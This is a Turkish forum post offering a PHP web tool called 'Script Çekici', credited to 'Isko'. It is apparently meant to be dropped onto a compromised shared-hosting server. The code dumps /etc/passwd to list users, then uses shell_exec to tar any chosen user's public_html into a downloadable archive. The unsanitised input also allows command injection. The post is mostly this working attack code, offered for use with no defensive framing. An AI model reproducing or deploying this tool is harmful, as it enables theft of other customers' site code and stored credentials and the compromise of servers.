Script cekici [PHP] (1 Viewer)

<center> <title>Script &#199;ekici by Isko</title> <form method="post" action=""> <?php $passwd=shell_exec("cat /etc/passwd"); echo "<textarea cols='85' rows='17'>"; echo...

QYroWr.jpg


PHP:
<center>
<title>Script &#199;ekici by Isko</title>
<form method="post" action="">
<?php
$passwd=shell_exec("cat /etc/passwd"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>";
?>
<br>Hedef Username (ex:passwd da bul useri) : <br><input type="text" name="user"><br>
<input type="submit" name="submit" value="&#199;ek"><br>
coded by <b>Isko</b>
</form>
</center>
<?php
# Script &#199;ekici
# Coded By iskorpion
ob_start();
set_time_limit(0);
class ceker{

public function script($hedef){


$phpself=dirname(__FILE__);
$cek=shell_exec("cd /home/".$hedef."/public_html/;tar cvzf ".$phpself."/".$hedef.".tar.gz *");

echo "<center><a href='".$hedef.".tar.gz'>".$hedef.".tar.gz</a></center>";
ob_flush();
flush();

}

}
if(isset($_POST['submit'])){
$ceker=new ceker();

$ceker->script($_POST['user']);
}

?>

🔒 Bu içeriği görmek için giriş yapın

 
Yanıt yazmak için giriş yapmalısınız
Forum özelliklerini kullanmak ve Level 2 üyelik satın almak için hesabınıza giriş yapın.

Users who are viewing this thread

133,369Konular
3,275,828Mesajlar
321,442Kullanıcılar
ReapermannSon Üye
Üst Alt